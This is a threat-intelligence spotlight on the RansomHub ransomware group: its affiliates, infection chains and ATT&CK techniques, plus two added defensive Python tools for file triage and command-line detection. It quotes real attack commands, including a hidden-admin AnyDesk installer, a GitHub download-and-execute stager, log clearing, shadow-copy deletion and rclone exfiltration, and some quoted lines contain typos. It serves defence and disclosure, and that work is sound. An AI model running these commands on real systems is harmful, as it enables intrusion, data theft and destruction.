Ransomware Spotlight: RansomHub

By Trend Research

RansomHub is a young Ransomware-as-a-Service (RaaS) group tracked by Trend Micro as Water Bakunawa. Despite being a young ransomware group first detected in February 2024, RansomHub moves boldly by targeting larger enterprises more likely to pay ransoms.

Infographic: Ransomware Spotlight: RansomHub

This Spotlight report has been updated on August 8, 2025, with additional data and insights from RansomHub activities observed from the fourth quarter of 2024 to the first half of 2025.

RansomHub is a Ransomware-as-a-Service (RaaS) group first detected in February 2024 and tracked by Trend Micro as Water Bakunawa. It quickly gained notoriety for its “big game hunting” tactic: it preys on victims who are more likely to pay large ransoms to limit the downtime a ransomware attack inflicts on business operations. The group targets cloud storage backups and misconfigured Amazon S3 buckets, threatening backup providers with data leaks and exploiting the trust between providers and their clients.

In March 2024, RansomHub added Change Healthcare to its list of victims. The company had previously been hit by BlackCat (also known as ALPHV) in an attack that made headlines when an affiliate accused the group of pulling an exit scam, after which the group went dark. It is possible that RansomHub is a rebrand of BlackCat, or that affiliates wronged in the alleged exit scam moved to RansomHub to collect the ransom money they believe they are owed. There are also reports that BlackCat affiliates are joining RansomHub.

In November 2024, a new attack chain attributed to RansomHub was observed, with initial access likely gained through phishing emails containing malicious attachments. Once inside the environment, the attackers used obfuscated NODESTEALER Python scripts to deliver an encrypted XWORM file, which then loaded additional encrypted shellcode into memory and communicated with the command-and-control server. Throughout the attack chain, RansomHub leveraged PowerShell and Python scripts to download tools from GitHub and Dropbox links, with NODESTEALER and XWORM serving as key components in facilitating ransomware deployment.

The group’s observed activities in November 2024 also showed that the cybercriminals behind RansomHub used a modified version of Trend Micro’s Secure Common Uninstall Tool (SCUT) as part of their defense evasion strategy. This phase likely began with the attackers compromising domain controllers and deploying Group Policy Objects (GPOs) that executed batch files across the network. To evade detection, they made use of uninstall tools from Trend Micro and CrowdStrike while relying on command-line file transfer utilities to copy files from shared network locations to local directories.

In another incident in the fourth quarter of 2024, a RansomHub affiliate leveraged a Python-based backdoor to maintain access to compromised endpoints. The SocGholish malware-as-a-service (MaaS) framework also played a key role: it provided the initial access used to drop second-stage payloads, including backdoor components that hand access to RansomHub affiliates.

In a February 2025 incident, the group was seen wiping disks on the victim’s machines and was also observed using BitLocker pre-boot authentication to encrypt target drives and prevent recovery and booting.

What organizations need to know about RansomHub ransomware

The RansomHub ransomware group (Water Bakunawa) recruits affiliates through RAMP, a predominantly Russian-language cybercriminal dark web forum. The group uses ransomware variants rewritten in Go to target Windows and Linux systems and a C++ variant to target ESXi servers. It adheres to strict rules: it does not attack non-profit organizations, and it does not re-attack victims who have already paid. It also avoids targeting members of the Commonwealth of Independent States (CIS), as well as Cuba, North Korea, and China.

RansomHub promises to provide a decryptor free of charge if an affiliate fails to deliver one after payment or if an affiliate mistakenly attacks an off-limits organization. Affiliates keep 90% of the ransom, with the remaining 10% going to the core group.

There are also notable similarities between RansomHub and the Knight ransomware group, also referred to as Cyclops. The management panel of RansomHub’s RaaS operation shares design and feature similarities with the Knight RaaS panel. Cyclops is recognized as the operator of the Knight RaaS program and offered the source code of Knight 3.0 ransomware for sale on the RAMP cybercrime forum on February 18, 2024. The offer included the source code for both the management panel and the ransomware, written in C++ and Go, the languages also used for RansomHub’s ransomware.

Interestingly, on February 12, 2024, days before the source code sale, the Knight RaaS Tor-based victim name-and-shame blog became inaccessible and remained so at the time of writing. Meanwhile, the RansomHub RaaS was launched around the same time. These connections suggest that the RansomHub ransomware may be a successor or substitute for the Knight ransomware group.

Yet another transfer is worth mentioning: DragonForce took over RansomHub in early 2025. RansomHub’s leak site went dark on March 31, and DragonForce effectively commandeered its infrastructure between that date and April 8, 2025, the day the takeover was publicly acknowledged. DragonForce then announced that RansomHub had “joined the cartel.” RansomHub is now considered inactive, last seen in breach reports from April 2025. Following the takeover, several of RansomHub’s known affiliates were observed migrating to other ransomware groups.

Infection chain and techniques

The following section details the initial infection chain observed from RansomHub activity as illustrated in Figure 1.

Figure 1: The RansomHub ransomware observed infection chain


Initial Access

  • The RansomHub ransomware group uses voice spear-phishing (vishing) for initial access. The cybercriminals use social engineering to orchestrate victim account password resets, employing callers with a convincing American accent to lure victims. RansomHub also possibly uses compromised VPN accounts.

Execution

  • Operators behind RansomHub use PsExec to execute commands remotely on the victim’s machine. They have also been observed using PowerShell scripts to execute commands related to credential access, discover remote systems, and establish SSH connections.
  • They have also been observed using Python scripts to establish SSH connections, transfer the encryptor via Secure File Transfer Protocol (SFTP), and execute the encryptor simultaneously across multiple servers.

Persistence

  • RansomHub creates a local account to maintain access and adds it to the Administrators group to retain elevated privileges.

Defense Evasion

  • RansomHub drops and executes a batch file named disableAV.bat, detected as Trojan.BAT.KAPROCHANDLER.A. It copies and executes the binary used to terminate and delete antivirus-related processes and files. That binary, detected as STONESTOP, uses a signed driver, detected as POORTRY, to delete files and terminate processes belonging to antivirus products.
  • The group also uses another batch file to delete multiple registry subkeys and entries in order to bypass virus and threat protection settings in Windows.
  • RansomHub also uses TDSSKiller, a legitimate anti-rootkit utility, to disable antivirus or EDR solutions on the target system, and TOGGLEDEFENDER to disable Windows Defender.
  • The group also uses EDRKillShifter, a loader executable that relies on the Bring Your Own Vulnerable Driver (BYOVD) technique, exploiting different vulnerable drivers to disable EDR protection.
  • The group also uses IObit Unlocker to unlock files and folders that are locked by other processes or programs.

Credential Access

  • RansomHub uses MIMIKATZ, LaZagne, and SecretServerSecretStealer to retrieve passwords and credentials from victim machines.
  • The group has also been observed exploiting CVE-2023-27532 in the Veeam Backup & Replication component: they connected to Veeam.Backup.Service.exe on TCP/9401, created a network share, then created and executed a PowerShell script that dumped credentials from the Veeam database to a text file. The group was also seen using Veeamp, a credential dumping tool built specifically to extract credentials from the SQL database used by Veeam backup management software.
  • The group has also been observed brute-forcing a domain controller, followed by an NTLMv1 logon to it, and extracting the NTDS.dit file, the database that stores Active Directory data including users, groups, security descriptors, and password hashes.
  • RansomHub also uses a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a CSV file.

Discovery

  • RansomHub operators use NetScan to discover and retrieve information about network devices. They also use Advanced Port Scanner to scan for open ports on network computers.

Lateral Movement

  • RansomHub uses the xcopy and copy commands to transfer the binary and driver used to terminate and delete antivirus-related processes and files, respectively. The group employs a PowerShell script to connect to a vCenter Server, retrieve all ESXi hosts, and configure the SSH service on each host to start automatically, enabling external SSH connections. The script can also reset the ESXi root user password before disconnecting from the vCenter Server.
  • RansomHub operators also use an Impacket-based SMB spreader provided to affiliates. The spreader runs a specified ransomware executable across the affected system’s local network.
  • The group also used SFTP to transfer the encryptor.

Command and Control

  • RansomHub operators use Atera, Splashtop, AnyDesk, Ngrok, ScreenConnect, and Remmina to gain remote access to victim machines.

Impact

  • RansomHub ransomware uses two encryption algorithms to encrypt target files: ECDH and AES. The ransomware then appends the 32-byte master public key from its configuration to the end of each encrypted file. The ransomware binary requires a -pass argument with a 32-byte passphrase to be specified when the ransomware is executed. The 32-byte passphrase is used to decrypt an embedded configuration during runtime which contains the file extensions, file names, and folders to avoid, processes and services to terminate, as well as compromised login accounts.

Exfiltration

  • RansomHub has been detected using the third-party tool RClone to exfiltrate stolen information to cloud storage.

Figures 2 and 3 illustrate the RansomHub infection chain from its observed campaigns in the fourth quarter of 2024.

Figure 2. The RansomHub infection chain that uses NODESTEALER and XWORM

Figure 3. RansomHub infection that uses a modified Secure Common Uninstall Tool (SCUT)

The following section details RansomHub infection chains that we investigated from the group’s observed campaigns in the fourth quarter of 2024.


Initial Access

  • In campaigns from the second half of 2024 to early 2025, RansomHub operators used SocGholish, which typically relies on drive-by compromises and social engineering to trick users into downloading a malicious JavaScript payload masquerading as a browser update. After the initial payload executes, the malware establishes a command-and-control (C&C) channel that lets the adversaries perform further actions.

Execution

  • RansomHub operators used Winhelper.ps1, x.ps1 and vcruntime.py to download and execute files and scripts from a GitHub repository.

Privilege Escalation

  • The RansomHub campaigns from the second half of 2024 to early 2025 used PowerRun, a utility that launches programs with TrustedInstaller (TI) privileges, which exceed those of a local Administrator because TrustedInstaller owns the protected system files and registry keys. A program run this way can modify system components and security settings that standard administrative controls would block.

Credential Access

  • RansomHub uses NODESTEALER to retrieve browser cookies and login credentials from the victim’s system.

Discovery

  • RansomHub operators also use nbtscan to conduct internal reconnaissance within a compromised network. It can also be used to scan IP networks, list NetBIOS computer names, collect MAC addresses, and list active users on a system.

Command and Control

  • RansomHub also uses XWORM to connect to a command and control server, COBEACON for command execution and other functions, Python SOCKS5 Proxy Client to maintain access to compromised endpoints and deploy encryptors, Betruger for the uploading of files to the C&C server and other functions, and Configure-SMRemoting to configure and enable PowerShell remoting on Windows systems.

Defense Evasion

  • RansomHub threat actors were observed using a modified version of the legitimate Secure Common Uninstall Tool (SCUT), patched to skip verification of the JWT token and the check that the process was launched by a Trend Micro process. With those checks removed, the attackers can run the uninstaller as if it had been invoked legitimately and remove the agent.
  • RansomHub threat actors also used AMSI Bypass Patcher, which locates the AmsiScanBuffer function inside amsi.dll in memory and patches it, so that script content submitted for scanning is no longer flagged and potentially malicious code can execute undetected.
  • The group also used GMER to detect and remove rootkits, as well as Uninstall-CS-ISG.bat, a batch file disguised as a CrowdStrike uninstall script, to transfer tools, uninstall CrowdStrike and Apex One agents, and execute the ransomware payload.

Exfiltration

  • RansomHub threat actors in their observed campaigns from the second half of 2024 to early 2025 used MEGAsync, which is an installable application that synchronizes folders between computers and MEGA Cloud Drives.

Impact

  • RansomHub actors used VeraCrypt to encrypt backup storage devices.

MITRE tactics and techniques

In this section, we detail the MITRE ATT&CK tactics and techniques observed across two sets of RansomHub campaigns. The first table enumerates the techniques the ransomware family used in its first observed campaign in the first half of 2024.


T1078 - Valid Accounts
The ransomware group may have used compromised VPN accounts.

T1566.004 - Phishing: Spearphishing Voice
Based on external reports, the ransomware group uses social engineering to orchestrate victim account password resets, particularly with American-accented callers.

T1059.001 - Command and Scripting Interpreter: PowerShell
• Based on external reports, the ransomware group uses PowerShell scripts to execute commands related to credential access, discover remote systems, and enable SSH service.
• The ransomware group also used a PowerShell script to download and silently install AnyDesk, set an unattended-access password, create a local administrator account hidden from the logon screen (the SpecialAccounts\Userlist entry set to 0 does the hiding), and print the AnyDesk ID:
Function AnyDesk {
    mkdir "C:\ProgramData\AnyDesk"
    # Download AnyDesk
    $clnt = new-object System.Net.WebClient
    $url = "hxxp://download[.]anydesk[.]com/AnyDesk.exe"
    $file = "C:\ProgramData\AnyDesk.exe"
    $clnt.DownloadFile($url,$file)
    cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
    cmd.exe /c echo {redacted} | C:\ProgramData\anydesk.exe --set-password
    net user {redacted} "{redacted}" /add
    net localgroup Administrators {redacted} /ADD
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v {redacted} /t REG_DWORD /d 0 /f
    cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}

T1059.006 - Command and Scripting Interpreter: Python
Based on external reports, the ransomware group utilizes a customized Python script to establish an SSH connection with targeted ESXi servers, transfer the encryptor via SFTP, confirm the successful transfer, and execute the encryptor simultaneously across multiple servers.

T1059.003 - Command and Scripting Interpreter: Windows Command Shell
The ransomware binary accepts the following parameters:

Other versions of RansomHub accept the following command line parameters:

It can also execute supplied commands before its encryption routine through the -cmd {command to execute} parameter.

T1136.001 - Create Account: Local Account
The ransomware group executed commands via the net command-line utility to create a local account, maintaining access to victim systems.

T1098 - Account Manipulation
The ransomware group executed commands via the net command-line utility to add the created user account to the Administrators group to maintain elevated access.

T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
If -safeboot is passed as an argument, the ransomware binary adds the following entry to the SOFTWARE\Microsoft\Windows NT\CurrentVersion\RunOnce registry key to execute itself upon reboot. The leading asterisk in the value name matters: Windows runs RunOnce entries whose names begin with * even when the system boots into Safe Mode, which is exactly the state the -safeboot option puts the machine in.
*zCCyEs = {Malware File Path}\{Malware File Name} -safeboot-instance -pass {32-byte passphrase}

T1547 - Boot or Logon Autostart Execution
• The ransomware binary enables automatic logon by adding the following registry entries under SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
AutoAdminLogon = 1
DefaultUserName = Administrator
DefaultDomainName =
DefaultPassword = {random characters}
• The credentials are then saved to a text file named user.txt, and the login information is also displayed in the console.

T1078.003 - Valid Accounts: Local Accounts
If -safeboot is passed as an argument, the ransomware binary attempts to log on as the administrator using the compromised usernames and passwords stored under the credentials key of its encrypted configuration, via the LogonUserW API. If the logon attempt fails, it enables automatic logon as described above.

T1134.001 - Access Token Manipulation: Token Impersonation/Theft
The ransomware binary can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.

T1480 - Execution Guardrails
The ransomware binary requires a -pass argument with a 32-byte passphrase when it is executed. If the wrong passphrase is supplied, the sample does not execute properly and instead prints bad config to the console. Because the configuration can only be decrypted with that passphrase, a sample recovered without its command line cannot be fully analyzed dynamically.

T1112 - Modify Registry
Based on external reports, the ransomware group removes various registry subkeys and entries to bypass virus and threat protection settings in Windows:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies" /f
reg delete "HKCU\Software\Microsoft\WindowsSelfHost" /f
reg delete "HKCU\Software\Policies" /f
reg delete "HKLM\Software\Microsoft\Policies" /for
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\PColicies" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Windows Store\Windows Update" /f
reg delete "HKLM\Software\Microsoft\WindowsSelfHost" /f
reg delete "HKLM\Software\Policies" /f
reg delete "HKLM\Software\WOW6432Node\Microsoft\Policies" /for
reg delete "HKLM\Software\WOW6432Node\Microsoft\Windows\\CurrentVersion\Policies" /f
reg delete "HKLM\Software\WOW6432Node\Microsoft\Windows\\CurrentVersion\Windows Store\Windows Update" /f

T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File
The ransomware binary uses an encrypted configuration that is decrypted at runtime with the 32-byte passphrase supplied on the command line. The configuration also contains configurable options under its settings key.

T1564.003 - Hide Artifacts: Hidden Window
The ransomware binary uses the ShowWindow API to hide its console window.

T1070.001 - Clear Windows Event Logs
Using the CreateProcessW API, the ransomware binary clears Windows event logs with the following commands:
• cmd.exe /c wevtutil cl security
• cmd.exe /c wevtutil cl system
• cmd.exe /c wevtutil cl application
The ransomware group also used a batch file named LogDel.bat to clear Windows event logs; the list of cleared logs is included in the IoCs.

T1562.006 - Impair Defenses: Indicator Blocking
The ransomware binary calls the SetErrorMode API with 0x8003 (SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX) so that the system displays no error dialogs, keeping crashes and failed file opens from alerting the user.

T1222.001 - Windows File and Directory Permissions Modification
It executes the following commands to enable remote-to-local (R2L) and remote-to-remote (R2R) symbolic link evaluation, so that symbolic links on remote shares can resolve to local and remote targets:
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"
LogDel.bat was also used to strip the system and hidden attributes from Default.rdp, the file that records the most recent RDP connection settings:
attrib Default.rdp -s -h

T1562.009 - Impair Defenses: Safe Mode Boot
If -safeboot is passed as an argument, the ransomware binary can reboot the victim's machine into safe mode with networking by executing the following command via the CreateProcessW API:
bcdedit /set {default} safeboot network

T1003 - OS Credential Dumping
After connecting to Veeam.Backup.Service.exe on TCP/9401, the group creates a network share using the net command-line utility, then writes a PowerShell script to the share and executes it to dump credentials from the Veeam database. The dumped credentials are saved to a text file.

T1003.003 - OS Credential Dumping: NTDS
The ransomware group was observed to be extracting the NTDS.dit file.

T1110 - Brute Force
The ransomware group conducted a brute force attack against the domain controller, followed by an NTLMv1 logon to it.

T1110.003 - Brute Force: Password Spraying
The ransomware group used a batch file named 232.bat to perform password spraying.

T1003.001 - OS Credential Dumping: LSASS Memory
The ransomware group dumped credentials by creating a memory dump of the LSASS process through Task Manager.

T1555.005 - Credentials from Password Stores: Password Managers
Based on external reports, the ransomware group used a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a CSV file.

T1057 - Process Discovery
The ransomware binary uses the Process32FirstW and Process32NextW APIs to search for the processes it will terminate, as listed under the kill_processes key of its configuration (the full list is included in the IoCs).

T1082 - System Information Discovery
The ransomware binary uses the API GetLogicalDriveStringsW to enumerate all mounted drives, and GetDriveTypeW to determine the drive type.

T1083 - File and Directory Discovery
The ransomware binary uses the FindFirstFileW and FindNextFileW APIs to search for files and folders to encrypt, skipping those listed under the white_files and white_folders keys of its configuration (the full lists are included in the IoCs).

T1082 - System Information Discovery
The ransomware binary attempts to determine whether it is running under WINE by using the GetProcAddress API to check for the presence of the wine_get_version function.

T1087.001 - Account Discovery: Local Account
The ransomware binary uses the API NetUserEnum to enumerate local accounts.

T1135 - Network Share Discovery
The ransomware binary uses the NetShareEnum API to discover shared resources on the compromised host so that it can encrypt them.

T1570 - Lateral Tool Transfer
The ransomware binary uses the xcopy and copy commands to transfer the binary and driver used to terminate and delete antivirus-related processes and files, respectively.

T1021.004 - Remote Services: SSH
Based on external reports, the ransomware group employed a PowerShell script to connect to a vCenter Server, retrieve all ESXi hosts, and configure the SSH service on each host to start automatically, enabling external SSH connections. The script also has the capability to reset the ESXi root user password and then disconnect from the vCenter Server.

T1105 - Ingress Tool Transfer
Based on external reports, the ransomware group uses SFTP to transfer the encryptor.

T1486 - Data Encrypted for Impact
It avoids encrypting files with the following file extensions:
• *.deskthemepack
• *.themepack
• *.theme
• *.msstyles
• *.exe
• *.drv
• *.msc
• *.dll
• *.lock
• *.sys
• *.msu
• *.lnk
• *.ps1
• *.iso
• *.inf
• *.cab
• *.386

It avoids encrypting files with the following strings in their file name:
• NTUSER.DAT
• autorun.inf
• boot.ini
• desktop.ini
• thumbs.db

• It avoids encrypting files found in the folders listed under the white_folders key of its configuration.
• It appends the first six characters of the master public key as a file extension to each encrypted file.
• It empties the recycle bin of the affected machine.
• It drops the following ransom note in each encrypted directory:
{Encrypted directory}\README_{first six characters of the master public key}.txt
• It uses two encryption algorithms to encrypt target files, ECDH and AES, and appends the 32-byte master public key from its configuration to the end of each encrypted file. In this hybrid scheme the AES key material is derived through ECDH against the master public key, so recovery requires the operators' corresponding private key; the appended public key identifies the configuration a sample was built with rather than aiding decryption. The embedded configuration, decrypted at runtime, contains the file extensions, file names, and folders to avoid.
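The Impact entries above and in the infection chain section describe a recognizable on-disk format: a 32-byte master public key appended to every encrypted file, an extension made of the first six characters of that key, and a README_{six characters}.txt note. The following triage helper is an added example written for this article, not code from the report or from the ransomware. It recovers the dominant trailing key from a directory, checks that each file's extension agrees with its trailing key, and predicts the ransom note name. One assumption is ours: that the six characters come from the hexadecimal rendering of the key. All sample files are constructed in a temporary directory.

```python
"""Triage of files encrypted in the format the report describes.

Added example, not code from the report. Known from the report: a 32-byte master
public key is appended to every encrypted file, the extension is the first six
characters of that key, and the note is README_{those six characters}.txt.
Assumption made here: the six characters come from the key's hex rendering.
All sample files are constructed.
"""
import os
import tempfile
from collections import Counter

KEY_LEN = 32  # bytes of master public key appended to each encrypted file


def trailing_key(path):
    """Last 32 bytes of a file, or None if the file is too small to carry a key."""
    size = os.path.getsize(path)
    if size < KEY_LEN:
        return None
    with open(path, "rb") as fh:
        fh.seek(size - KEY_LEN)
        return fh.read(KEY_LEN)


def extension_for(key):
    """Extension the report's rule predicts for a key (hex rendering is our assumption)."""
    return key.hex()[:6]


def triage(directory):
    """Classify the files in a directory against the dominant trailing key.

    encrypted: trailing key matches and the extension matches the key
    tail_only: trailing key matches but the name was changed (e.g. renamed by a user)
    no_match:  trailing bytes differ, so probably not touched by this sample
    """
    tails = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and not name.lower().startswith("readme_"):
            key = trailing_key(path)
            if key is not None:
                tails[name] = key
    if not tails:
        return {"master_key_hex": None, "encrypted": [], "tail_only": [],
                "no_match": [], "ransom_note": None, "note_present": False}
    master, _ = Counter(tails.values()).most_common(1)[0]
    ext = extension_for(master)
    result = {"master_key_hex": master.hex(), "encrypted": [], "tail_only": [], "no_match": []}
    for name, key in tails.items():
        if key != master:
            result["no_match"].append(name)
        elif name.endswith("." + ext):
            result["encrypted"].append(name)
        else:
            result["tail_only"].append(name)
    result["ransom_note"] = f"README_{ext}.txt"
    result["note_present"] = os.path.exists(os.path.join(directory, result["ransom_note"]))
    return result


def build_sample_dir():
    """Constructed victim directory: three encrypted files, one renamed, one untouched."""
    key = bytes(range(0x10, 0x10 + KEY_LEN))  # stand-in for the 32-byte master public key
    ext = extension_for(key)                  # "101112"
    directory = tempfile.mkdtemp(prefix="rh_triage_")
    for name in ("budget.xlsx", "contract.docx", "photo.jpg"):
        with open(os.path.join(directory, f"{name}.{ext}"), "wb") as fh:
            fh.write(os.urandom(256) + key)   # ciphertext stand-in, key appended
    with open(os.path.join(directory, "renamed.bin"), "wb") as fh:
        fh.write(os.urandom(64) + key)        # key still there, extension stripped
    with open(os.path.join(directory, "notes.txt"), "wb") as fh:
        fh.write(b"plain text that was never encrypted\n" * 4)
    with open(os.path.join(directory, f"README_{ext}.txt"), "w") as fh:
        fh.write("constructed ransom note placeholder\n")
    return directory, key


if __name__ == "__main__":
    sample_dir, _ = build_sample_dir()
    for field, value in triage(sample_dir).items():
        print(f"{field}: {value}")
```

The recovered master_key_hex is worth recording in the case file: because the key comes from the sample's configuration, it ties files on different hosts to the same build even when the affiliate renamed the payload between systems.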

T1490 -  Inhibit System Recovery
The ransomware binary executes the following command to delete shadow copies:
powershell.exe -Command Powershell -Command "\"Get-CimInstance Win32_ShadowCopy | Remove-CimInstance\""

T1489 - Service Stop
The ransomware binary executes the following commands to stop all virtual machines running on a Hyper-V host:
powershell.exe -Command PowerShell -Command "\"Get-VM | Stop-VM -Force\""
The ransomware binary also stops all the IIS services using the following command:
cmd.exe /c iisreset.exe /stop
The ransomware binary uses the ControlService API with dwControl set to 1 (SERVICE_CONTROL_STOP) to terminate the services listed under the kill_services key of its configuration (the full list is included in the IoCs).

T1529 - System Shutdown/Reboot
If -safeboot is passed as an argument, the ransomware binary issues the following command to reboot a system:
cmd.exe /c shutdown /r /f /t 0

T1567.002 - Exfiltration to Cloud Storage
Using RClone, the group exfiltrated files via the following command (the --max-age 2020-01-01 filter limits the copy to files modified since that date, and the include list restricts it to documents, spreadsheets, databases, mail archives, and images, keeping the transfer small and the data valuable):
rclone copy \\{redacted}\i$ {redacted}\Users --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.doc" --include "*.msg" --include "*.rtf" --include "*.mdb" --include "*.db" --include "*.csv" --include "*.docx" --include "*.jpg" --include "*.png" --include "*.dot" --include "*.wbk" --include "*.docm" --include "*.dotx" --include "*.xlt" --include "*.xlm" --include "*.accdb" --include "*.sql" --include "*.pst" --include "*.jpeg" --include "*.xlsm" --include "*.xlsb" --include "*.xlr" --include "*.sqb" --include "*.sq" --include "*.DCM" --include "*.tif" --max-age 2020-01-01
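Most of the behaviours in this table leave distinctive command lines or registry writes behind, which makes them straightforward to detect. The following is an added example written for this article, not code from the report: a small Python rule set that runs the T1070.001, T1222.001, T1562.009, T1490, T1489, T1529, T1547.001, T1547, T1112, T1480 and T1567.002 indicators described above over process-creation and registry-set events, and then correlates the three events that make up the -safeboot sequence. The one-line event format, the regular expressions, the 32-character passphrase and all sample events are constructed for the example; none come from an incident.

```python
"""Detection rules for the RansomHub command-line behaviour described in the report.

Added example, not code from the report. Events are constructed one-line records in
a Sysmon-like shape (ProcessCreate CommandLine=... / RegistryValueSet
TargetObject=... Details=...). Patterns are ours; ATT&CK IDs follow the report.
"""
import re
from collections import Counter, namedtuple

Rule = namedtuple("Rule", "attack_id name pattern")

RULES = [
    Rule("T1070.001", "event log clearing", r"\bwevtutil(\.exe)?\s+cl\b"),
    Rule("T1222.001", "remote symlink evaluation enabled",
         r"fsutil\s+behavior\s+set\s+SymlinkEvaluation\s+R2[LR]:1"),
    Rule("T1562.009", "safe mode with networking configured",
         r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+safeboot\s+network"),
    Rule("T1490", "shadow copies removed", r"Win32_ShadowCopy\s*\|\s*Remove-CimInstance"),
    Rule("T1489", "Hyper-V guests stopped", r"Get-VM\s*\|\s*Stop-VM\s+-Force"),
    Rule("T1489", "IIS stopped", r"\biisreset(\.exe)?\s+/stop"),
    Rule("T1529", "forced immediate reboot", r"\bshutdown(\.exe)?\s+/r\s+/f\s+/t\s+0\b"),
    # A RunOnce value whose name starts with '*' also runs in Safe Mode.
    Rule("T1547.001", "RunOnce safe-mode self-start",
         r"RunOnce\\\*[^\s=]+\s.*-safeboot-instance"),
    Rule("T1547", "AutoAdminLogon enabled", r'AutoAdminLogon\b.*(Details=|/d\s+)"?1\b'),
    Rule("T1112", "policy key deletion",
         r'\breg(\.exe)?\s+delete\s+"?HK(LM|CU)\\Software\\(WOW6432Node\\)?(Microsoft\\)?'
         r"(Windows\\CurrentVersion\\)?Policies"),
    Rule("T1480", "32-character -pass guardrail", r"(^|\s)-pass\s+\S{32}(\s|$)"),
    Rule("T1567.002", "rclone copy from a UNC path", r"\brclone(\.exe)?\s+copy\s+\\\\"),
]

# Constructed events: four benign administrator actions, then the report's behaviours.
SAMPLE_EVENTS = [
    r"ProcessCreate CommandLine=wevtutil.exe qe Security /c:5 /rd:true",
    r"ProcessCreate CommandLine=bcdedit /enum",
    r"ProcessCreate CommandLine=rclone.exe version",
    r"ProcessCreate CommandLine=reg query HKLM\Software\Policies",
    r"ProcessCreate CommandLine=cmd.exe /c wevtutil cl security",
    r"ProcessCreate CommandLine=cmd.exe /c wevtutil cl system",
    r'ProcessCreate CommandLine=cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"',
    r"ProcessCreate CommandLine=C:\Users\Public\rh.exe -pass aB3dE6gH9jK2mN5pQ8sT1vW4yZ7bC0eF -safeboot",
    r"RegistryValueSet TargetObject=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RunOnce\*zCCyEs "
    r"Details=C:\Users\Public\rh.exe -safeboot-instance -pass aB3dE6gH9jK2mN5pQ8sT1vW4yZ7bC0eF",
    r"RegistryValueSet TargetObject=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon Details=1",
    r"ProcessCreate CommandLine=bcdedit /set {default} safeboot network",
    r"ProcessCreate CommandLine=cmd.exe /c shutdown /r /f /t 0",
    r'ProcessCreate CommandLine=powershell.exe -Command Powershell -Command "\"Get-CimInstance Win32_ShadowCopy | Remove-CimInstance\""',
    r"ProcessCreate CommandLine=cmd.exe /c iisreset.exe /stop",
    r'ProcessCreate CommandLine=reg delete "HKLM\Software\Policies" /f',
    r'ProcessCreate CommandLine=rclone copy \\fileserver\i$ remote:Users --include "*.pdf" --include "*.docx" --max-age 2020-01-01',
]


def scan(events):
    """Return (event_index, attack_id, rule_name) for every rule that fires on every event."""
    hits = []
    for idx, line in enumerate(events):
        for rule in RULES:
            if re.search(rule.pattern, line, re.IGNORECASE):
                hits.append((idx, rule.attack_id, rule.name))
    return hits


def summarize(events):
    """Count how many events triggered each ATT&CK ID."""
    return Counter(attack_id for _, attack_id, _ in scan(events))


def safeboot_chain(events):
    """True when all three pieces of the -safeboot sequence are present:
    the RunOnce self-start, bcdedit safeboot network, and the forced reboot."""
    seen = {attack_id for _, attack_id, _ in scan(events)}
    return {"T1547.001", "T1562.009", "T1529"} <= seen


if __name__ == "__main__":
    for idx, attack_id, name in scan(SAMPLE_EVENTS):
        print(f"event {idx:2d}  {attack_id:<10} {name}")
    print("safeboot chain complete:", safeboot_chain(SAMPLE_EVENTS))
```

The individual rules are deliberately narrow (a query with wevtutil or an enumeration with bcdedit does not fire); the correlation in safeboot_chain is what turns three medium-confidence events into one high-confidence alert, since a legitimate administrator has little reason to combine a Safe Mode RunOnce entry with a forced safeboot reboot.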

The following table details the MITRE tactics and techniques from the group’s campaigns in the fourth quarter of 2024. While they overlap with the TTPs used in the group’s previous campaign in March 2024, there are key differences that show how the threat actors keep adopting more sophisticated techniques to circumvent defenses.


T1566.001 - Phishing: Spearphishing Attachment
Based on our investigation, the threat actor likely utilized a phishing email containing a malicious ZIP file. Inside the ZIP file is a binary file masquerading as a PDF, which triggers the execution of the PowerShell script WinHelper.ps1 using the command:
PowerShell -ep bypass -w hidden -f C:\Users\Public\WinHelper.ps1

T1059.001 - Command and Scripting Interpreter: PowerShell
The group was also observed using a PowerShell downloader named WinHelper.ps1 to retrieve and execute another PowerShell file from a GitHub repository:
$url='hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/sp02/refs/heads/main/s'
$url2=''
$tExt20=((New-Object System[.]Net[.]WebClient).DoWnloAdString('hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/PowerShell/refs/heads/main/x[.]ps1'))
iEx $text20

RansomHub also used another PowerShell script named x.ps1 to download and extract an archived Python environment from a Dropbox link into the C:\WinExplorer directory, in the following steps:
• The script first downloads a ZIP file from a Dropbox link and saves it as WinHelper.zip in C:\WinExplorer\.
• It then uses Expand-Archive to extract the downloaded ZIP file into the C:\WinExplorer\ directory.

They also used the PowerShell script to create and execute Python files that establish persistence and download and execute a remote script from a GitHub repository, in the following steps:
• The script reads the content of a file (Gimport.dat) into $stct and $stct2, replaces the %up% placeholders with the variables $url and $url2, and writes the modified content into two new Python files: vcruntime140.py and vcruntime140d.py.
• The script then executes the Python interpreter (python.exe) located in C:\WinExplorer\ to run the two generated Python scripts (vcruntime140.py and vcruntime140d.py).

